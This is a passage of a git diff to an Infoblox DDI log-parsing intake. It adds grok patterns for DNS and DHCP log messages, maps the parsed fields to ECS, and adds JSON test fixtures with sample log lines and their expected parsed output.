"(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*CEF:0\\|Infoblox\\|NIOS\\|%{GREEDYDATA:infoblox_nios_log_dns_version}\\|RPZ-%{DATA:dns_answers_type}\\|%{DATA:infoblox_nios_log_dns_answers_policy}\\|\\d+\\|app=DNS dst=%{IP:server_ip} src=%{IP:client_ip} spt=%{NUMBER:client_port} view=%{DATA:infoblox_nios_log_dns_view_name} qtype=%{WORD:dns_question_type} msg=%{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_11: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{GREEDYDATA:_tmp_timestamp} %{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags} %{GREEDYDATA:repeat_message}" + DNS_12: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{GREEDYDATA:_tmp_timestamp} %{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags}" + DNS_13: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{GREEDYDATA:infoblox_nios_log_dns_message}" + + # Original pattern + DNS_0: '(%{WORD:infoblox_nios_log_dns_category}: )?client ?(%{DATA}) %{IP:client_ip}#%{INT:client_port} (%{DATA}): query: %{DATA:dns_question_name} %{WORD:dns_question_class} %{WORD:dns_question_type} %{QUERY_FLAGS} \(%{IP}\)' + + # Other patterns + + ## For DNS message like: + ## FORMERR resolving 'test.testing.io/AAAA/IN': 192.168.1.136#53 + DNS_FORMERR: "%{WORD:event_action} resolving '%{DATA:dns_question_name}/%{DATA:dns_question_type}/%{DATA:dns_question_class}': %{IP:client_ip}#%{NUMBER:client_port}" + + ## For other message like: + ## r-l-e:192.168.1.113,Fixed,P76984,c4:d0:e3:b4:08:4d,1732119022,1732291822,,$ + DNS_OTHER: "r-l-e:%{IP:client_ip},%{DATA:infoblox_nios_log_dns_category},%{DATA:infoblox_nios_log_dns_client_hostname},%{MAC:client_mac},%{NUMBER:infoblox_nios_log_dns_lease_start},%{NUMBER:infoblox_nios_log_dns_lease_end},%{GREEDYDATA:infoblox_nios_log_dns_message}" + + - name: parse_event + filter: "{{'REQUEST DHCP' in original.message or 'DHCPREQUEST' in original.message}}" + external: + name: grok.match + properties: + output_field: message + pattern: "%{DHCP_1}|%{DHCP_2}|%{DHCP_3}|%{DHCP_4}|%{DHCP_5}|%{DHCP_6}|%{DHCP_7}|%{DHCP_8}|%{DHCP_9}|%{DHCP_10}|%{DHCP_11}|%{DHCP_12}|%{DHCP_OTHER}" + custom_patterns: + DHCP_1: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} \(%{DATA:infoblox_nios_log_dhcp_client_hostname}\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{DATA:infoblox_nios_log_dhcp_uid} \(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\)' + DHCP_2: '%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} \(%{DATA:infoblox_nios_log_dhcp_client_hostname}\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{DATA:infoblox_nios_log_dhcp_uid} \(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\)' + DHCP_3: '%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} \(%{DATA:infoblox_nios_log_dhcp_client_hostname}\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{DATA:infoblox_nios_log_dhcp_uid}: %{GREEDYDATA:infoblox_nios_log_dhcp_request_message}' + DHCP_4: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} \(%{DATA:infoblox_nios_log_dhcp_client_hostname}\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}' + DHCP_5: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} \(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\)' + DHCP_6: '%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{DATA:infoblox_nios_log_dhcp_uid} \(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\)' + DHCP_7: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id}: %{GREEDYDATA:infoblox_nios_log_dhcp_request_message}' + DHCP_8: "%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id}: %{GREEDYDATA:infoblox_nios_log_dhcp_request_message}" + DHCP_9: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{GREEDYDATA:infoblox_nios_log_dhcp_trans_id}' + DHCP_10: "%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCP_11: "%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{GREEDYDATA:infoblox_nios_log_dhcp_trans_id}" + DHCP_12: "%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name})" + + # Other patterns + + ## For DHCP message like: + ## Option 82: received a REQUEST DHCP packet from relay-agent eth2 with a circuit-id of "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0", a remote-id of "0a:44:70:46" for 192.168.1.222 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW) + DHCP_OTHER: 'Option %{NUMBER}: received a %{DATA:event_action} packet from %{NOTSPACE} %{DATA:infoblox_nios_log_dhcp_relay_interface_name} with a circuit-id of \"%{DATA:infoblox_nios_log_dhcp_circuit_id}\", a remote-id of \"%{DATA:infoblox_nios_log_dhcp_remote_id}\" for %{IP:client_ip} \(%{MAC:client_mac}\) lease time is %{DATA:infoblox_nios_log_dhcp_lease_time} seconds. \(%{DATA:infoblox_nios_log_dhcp_lease_message}\)' + + - name: parse_event + filter: "{{'DHCPACK' in original.message}}" + external: + name: grok.match + properties: + output_field: message + pattern: "%{DHCPACK_1}|%{DHCPACK_2}|%{DHCPACK_3}|%{DHCPACK_4}|%{DHCPACK_5}|%{DHCPACK_6}|%{DHCPACK_7}|%{DHCPACK_8}|%{DHCPACK_9}|%{DHCPACK_10}|%{DHCPACK_11}|%{DHCPACK_12}" + custom_patterns: + # Patterns are inspired by + # https://github.com/elastic/integrations/blob/main/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_dhcp.yml + DHCPACK_1: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} offered-duration %{NUMBER:infoblox_nios_log_dhcp_offered_duration} \\(%{DATA:infoblox_nios_log_dhcp_message}\\) uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_2: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} offered-duration %{NUMBER:infoblox_nios_log_dhcp_offered_duration} \\(%{DATA:infoblox_nios_log_dhcp_message}\\) uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_3: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} \\(%{DATA:infoblox_nios_log_dhcp_lease_message}\\) uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_4: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} offered-duration %{NUMBER:infoblox_nios_log_dhcp_offered_duration} \\(%{DATA:infoblox_nios_log_dhcp_message}\\)" + DHCPACK_5: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} \\(%{DATA:infoblox_nios_log_dhcp_lease_message}\\) uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_6: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} \\(%{DATA:infoblox_nios_log_dhcp_lease_message}\\)" + DHCPACK_7: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} \\(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\\)" + DHCPACK_8: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_9: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{GREEDYDATA:infoblox_nios_log_dhcp_lease_duration}" + DHCPACK_10: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_11: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{GREEDYDATA:infoblox_nios_log_dhcp_lease_duration}" + DHCPACK_12: "%{WORD:event_action} to %{IP:client_ip} \\(%{MAC:client_mac}\\) via %{WORD:observer_ingress_interface_name}" + + - name: parse_datetime + external: + name: date.parse + properties: + input_field: "{{parse_event.message._tmp_timestamp}}" + output_field: result + format: "%d-%b-%Y %H:%M:%S.%f" + - name: set_ecs_fields stages: set_ecs_fields: actions: - set: - source.ip: "{{parse_event.message.src}}" - filter: "{{parse_event.message.src | is_ipaddress}}" + source.ip: "{{parse_event.message.client_ip}}" + filter: "{{parse_event.message.client_ip | is_ipaddress}}" - set: - source.port: "{{parse_event.message.spt}}" + "@timestamp": "{{parse_datetime.result}}" + event.action: "{{parse_event.message.event_action}}" + + source.port: "{{parse_event.message.client_port}}" + source.mac: "{{parse_event.message.client_mac}}" + + observer.ingress.interface.name: "{{parse_event.message.observer_ingress_interface_name}}" + + infoblox.dhcp.interface_ip: "{{parse_event.message.infoblox_nios_log_dhcp_interface_ip}}" + infoblox.dhcp.trans_id: "{{parse_event.message.infoblox_nios_log_dhcp_trans_id}}" + infoblox.dhcp.router_ip: "{{parse_event.message.infoblox_nios_log_dhcp_router_ip}}" + infoblox.dhcp.request_message: "{{parse_event.message.infoblox_nios_log_dhcp_request_message}}" + infoblox.dhcp.lease_message: "{{parse_event.message.infoblox_nios_log_dhcp_lease_message}}" + infoblox.dhcp.lease_time: "{{parse_event.message.infoblox_nios_log_dhcp_lease_time}}" + infoblox.dhcp.circuit_id: "{{parse_event.message.infoblox_nios_log_dhcp_circuit_id}}" + + dns.type: "query" dns.question.class: "{{parse_event.message.dns_question_class}}" dns.question.type: "{{parse_event.message.dns_question_type}}" dns.question.name: "{{parse_event.message.dns_question_name}}" - dns.type: "query" + dns.response_code: "{{parse_event.message.dns_response_code}}" + dns.header_flags: > [ {% if parse_event.message.flags_rd == "+" %}"RD",{% endif %} @@ -42,4 +148,4 @@ stages: filter: '{{parse_event.message.flags_tcp == "T"}}' - set: - infoblox.ddi.category: "{{parse_event.message.category}}" + infoblox.ddi.category: "{{parse_event.message.infoblox_nios_log_dns_category}}" diff --git a/Infoblox/ddi/tests/query_log_dhcp_1.json b/Infoblox/ddi/tests/query_log_dhcp_1.json new file mode 100644 index 000000000..43383a2e1 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dhcp_1.json @@ -0,0 +1,32 @@ +{ + "input": { + "message": "Option 82: received a REQUEST DHCP packet from relay-agent eth2 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.222 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)" + }, + "expected": { + "message": "Option 82: received a REQUEST DHCP packet from relay-agent eth2 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.222 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)", + "event": { + "action": "REQUEST DHCP" + }, + "dns": { + "header_flags": [], + "type": "query" + }, + "infoblox": { + "dhcp": { + "circuit_id": "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0", + "lease_message": "NEW", + "lease_time": "undefined" + } + }, + "related": { + "ip": [ + "192.168.1.222" + ] + }, + "source": { + "address": "192.168.1.222", + "ip": "192.168.1.222", + "mac": "00:50:56:ae:b3:44" + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dhcp_2.json b/Infoblox/ddi/tests/query_log_dhcp_2.json new file mode 100644 index 000000000..9474b00d8 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dhcp_2.json @@ -0,0 +1,32 @@ +{ + "input": { + "message": "Option 82: received a REQUEST DHCP packet from relay-agent 192.168.1.53 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.53 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)" + }, + "expected": { + "message": "Option 82: received a REQUEST DHCP packet from relay-agent 192.168.1.53 with a circuit-id of \"1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0\", a remote-id of \"0a:44:70:46\" for 192.168.1.53 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW)", + "event": { + "action": "REQUEST DHCP" + }, + "dns": { + "header_flags": [], + "type": "query" + }, + "infoblox": { + "dhcp": { + "circuit_id": "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0", + "lease_message": "NEW", + "lease_time": "undefined" + } + }, + "related": { + "ip": [ + "192.168.1.53" + ] + }, + "source": { + "address": "192.168.1.53", + "ip": "192.168.1.53", + "mac": "00:50:56:ae:b3:44" + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dhcp_3.json b/Infoblox/ddi/tests/query_log_dhcp_3.json new file mode 100644 index 000000000..bca901b0b --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dhcp_3.json @@ -0,0 +1,31 @@ +{ + "input": { + "message": "DHCPREQUEST for 192.168.1.107 from e8:c8:29:5c:c8:99 via 192.168.1.107 TransID 80b994d6" + }, + "expected": { + "message": "DHCPREQUEST for 192.168.1.107 from e8:c8:29:5c:c8:99 via 192.168.1.107 TransID 80b994d6", + "event": { + "action": "DHCPREQUEST" + }, + "dns": { + "header_flags": [], + "type": "query" + }, + "infoblox": { + "dhcp": { + "interface_ip": "192.168.1.107", + "trans_id": "80b994d6" + } + }, + "related": { + "ip": [ + "192.168.1.107" + ] + }, + "source": { + "address": "192.168.1.107", + "ip": "192.168.1.107", + "mac": "e8:c8:29:5c:c8:99" + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dhcp_4.json b/Infoblox/ddi/tests/query_log_dhcp_4.json new file mode 100644 index 000000000..417007f30 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dhcp_4.json @@ -0,0 +1,38 @@ +{ + "input": { + "message": "DHCPREQUEST for 192.168.1.208 from 00:50:56:ae:17:c6 (VDPSCE080019) via eth2 TransID 823c1fa3 uid 01:00:50:56:ae:17:c6 (RENEW)" + }, + "expected": { + "message": "DHCPREQUEST for 192.168.1.208 from 00:50:56:ae:17:c6 (VDPSCE080019) via eth2 TransID 823c1fa3 uid 01:00:50:56:ae:17:c6 (RENEW)", + "event": { + "action": "DHCPREQUEST" + }, + "dns": { + "header_flags": [], + "type": "query" + }, + "infoblox": { + "dhcp": { + "lease_message": "RENEW", + "trans_id": "823c1fa3" + } + }, + "observer": { + "ingress": { + "interface": { + "name": "eth2" + } + } + }, + "related": { + "ip": [ + "192.168.1.208" + ] + }, + "source": { + "address": "192.168.1.208", + "ip": "192.168.1.208", + "mac": "00:50:56:ae:17:c6" + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dhcp_5.json b/Infoblox/ddi/tests/query_log_dhcp_5.json new file mode 100644 index 000000000..14a6991a4 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dhcp_5.json @@ -0,0 +1,33 @@ +{ + "input": { + "message": "DHCPREQUEST for 192.168.1.95 (192.168.1.95) from d8:94:03:ec:da:d1 via 192.168.1.95 TransID ac1b72c4: lease 192.168.1.95 unavailable." + }, + "expected": { + "message": "DHCPREQUEST for 192.168.1.95 (192.168.1.95) from d8:94:03:ec:da:d1 via 192.168.1.95 TransID ac1b72c4: lease 192.168.1.95 unavailable.", + "event": { + "action": "DHCPREQUEST" + }, + "dns": { + "header_flags": [], + "type": "query" + }, + "infoblox": { + "dhcp": { + "interface_ip": "192.168.1.95", + "request_message": "lease 192.168.1.95 unavailable.", + "router_ip": "192.168.1.95", + "trans_id": "ac1b72c4" + } + }, + "related": { + "ip": [ + "192.168.1.95" + ] + }, + "source": { + "address": "192.168.1.95", + "ip": "192.168.1.95", + "mac": "d8:94:03:ec:da:d1" + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dhcp_6.json b/Infoblox/ddi/tests/query_log_dhcp_6.json new file mode 100644 index 000000000..f0ca93fce --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dhcp_6.json @@ -0,0 +1,32 @@ +{ + "input": { + "message": "DHCPREQUEST for 192.168.1.159 from c8:09:a8:f8:cd:e8 via 192.168.1.159 TransID e711c0c1: ignored (unknown subnet)." + }, + "expected": { + "message": "DHCPREQUEST for 192.168.1.159 from c8:09:a8:f8:cd:e8 via 192.168.1.159 TransID e711c0c1: ignored (unknown subnet).", + "event": { + "action": "DHCPREQUEST" + }, + "dns": { + "header_flags": [], + "type": "query" + }, + "infoblox": { + "dhcp": { + "interface_ip": "192.168.1.159", + "request_message": "ignored (unknown subnet).", + "trans_id": "e711c0c1" + } + }, + "related": { + "ip": [ + "192.168.1.159" + ] + }, + "source": { + "address": "192.168.1.159", + "ip": "192.168.1.159", + "mac": "c8:09:a8:f8:cd:e8" + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dhcp_7.json b/Infoblox/ddi/tests/query_log_dhcp_7.json new file mode 100644 index 000000000..301ee3a35 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dhcp_7.json @@ -0,0 +1,32 @@ +{ + "input": { + "message": "DHCPACK on 192.168.1.138 to 08:71:90:8d:0b:5d (P70955) via eth2 relay 192.168.1.138 lease-duration 172800" + }, + "expected": { + "message": "DHCPACK on 192.168.1.138 to 08:71:90:8d:0b:5d (P70955) via eth2 relay 192.168.1.138 lease-duration 172800", + "event": { + "action": "DHCPACK" + }, + "dns": { + "header_flags": [], + "type": "query" + }, + "observer": { + "ingress": { + "interface": { + "name": "eth2" + } + } + }, + "related": { + "ip": [ + "192.168.1.138" + ] + }, + "source": { + "address": "192.168.1.138", + "ip": "192.168.1.138", + "mac": "08:71:90:8d:0b:5d" + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dhcp_8.json b/Infoblox/ddi/tests/query_log_dhcp_8.json new file mode 100644 index 000000000..a0415a271 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dhcp_8.json @@ -0,0 +1,27 @@ +{ + "input": { + "message": "r-l-e:192.168.1.113,Fixed,P76984,c4:d0:e3:b4:08:4d,1732119022,1732291822,,$" + }, + "expected": { + "message": "r-l-e:192.168.1.113,Fixed,P76984,c4:d0:e3:b4:08:4d,1732119022,1732291822,,$", + "dns": { + "header_flags": [], + "type": "query" + }, + "infoblox": { + "ddi": { + "category": "Fixed" + } + }, + "related": { + "ip": [ + "192.168.1.113" + ] + }, + "source": { + "address": "192.168.1.113", + "ip": "192.168.1.113", + "mac": "c4:d0:e3:b4:08:4d" + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_1.json b/Infoblox/ddi/tests/query_log_dns_1.json new file mode 100644 index 000000000..2c4c9a783 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_1.json @@ -0,0 +1,36 @@ +{ + "input": { + "message": "FORMERR resolving 'test.testing.io/AAAA/IN': 192.168.1.136#53" + }, + "expected": { + "message": "FORMERR resolving 'test.testing.io/AAAA/IN': 192.168.1.136#53", + "event": { + "action": "FORMERR" + }, + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "test.testing.io", + "registered_domain": "testing.io", + "subdomain": "test", + "top_level_domain": "io", + "type": "AAAA" + }, + "type": "query" + }, + "related": { + "hosts": [ + "test.testing.io" + ], + "ip": [ + "192.168.1.136" + ] + }, + "source": { + "address": "192.168.1.136", + "ip": "192.168.1.136", + "port": 53 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_2.json b/Infoblox/ddi/tests/query_log_dns_2.json new file mode 100644 index 000000000..44cae19f4 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_2.json @@ -0,0 +1,33 @@ +{ + "input": { + "message": "client 192.168.1.1#1130: UDP: query: test.io IN A response: NXDOMAIN +" + }, + "expected": { + "message": "client 192.168.1.1#1130: UDP: query: test.io IN A response: NXDOMAIN +", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "test.io", + "registered_domain": "test.io", + "top_level_domain": "io", + "type": "A" + }, + "response_code": "NXDOMAIN", + "type": "query" + }, + "related": { + "hosts": [ + "test.io" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 1130 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_3.json b/Infoblox/ddi/tests/query_log_dns_3.json new file mode 100644 index 000000000..6b742fbb7 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_3.json @@ -0,0 +1,33 @@ +{ + "input": { + "message": "client 192.168.1.1#12337: UDP: query: test.org IN A response: NXDOMAIN +AE" + }, + "expected": { + "message": "client 192.168.1.1#12337: UDP: query: test.org IN A response: NXDOMAIN +AE", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "test.org", + "registered_domain": "test.org", + "top_level_domain": "org", + "type": "A" + }, + "response_code": "NXDOMAIN", + "type": "query" + }, + "related": { + "hosts": [ + "test.org" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 12337 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_4.json b/Infoblox/ddi/tests/query_log_dns_4.json new file mode 100644 index 000000000..4806d5bab --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_4.json @@ -0,0 +1,34 @@ +{ + "input": { + "message": "client 192.168.1.1#37188: UDP: query: _ldap._tcp.test.test.net IN SRV response: NXDOMAIN +A" + }, + "expected": { + "message": "client 192.168.1.1#37188: UDP: query: _ldap._tcp.test.test.net IN SRV response: NXDOMAIN +A", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "_ldap._tcp.test.test.net", + "registered_domain": "test.net", + "subdomain": "_ldap._tcp.test", + "top_level_domain": "net", + "type": "SRV" + }, + "response_code": "NXDOMAIN", + "type": "query" + }, + "related": { + "hosts": [ + "_ldap._tcp.test.test.net" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 37188 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_5.json b/Infoblox/ddi/tests/query_log_dns_5.json new file mode 100644 index 000000000..bd240d9a7 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_5.json @@ -0,0 +1,34 @@ +{ + "input": { + "message": "client 192.168.1.1#37521: UDP: query: test.test.io IN AAAA response: NOERROR +A test.test.io. 86400 IN CNAME test.test.io." + }, + "expected": { + "message": "client 192.168.1.1#37521: UDP: query: test.test.io IN AAAA response: NOERROR +A test.test.io. 86400 IN CNAME test.test.io.", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "test.test.io", + "registered_domain": "test.io", + "subdomain": "test", + "top_level_domain": "io", + "type": "AAAA" + }, + "response_code": "NOERROR", + "type": "query" + }, + "related": { + "hosts": [ + "test.test.io" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 37521 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_6.json b/Infoblox/ddi/tests/query_log_dns_6.json new file mode 100644 index 000000000..1129be865 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_6.json @@ -0,0 +1,34 @@ +{ + "input": { + "message": "client 192.168.1.1#40432: UDP: query: test.test.org IN A response: NOERROR + test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1" + }, + "expected": { + "message": "client 192.168.1.1#40432: UDP: query: test.test.org IN A response: NOERROR + test.test.org. 365 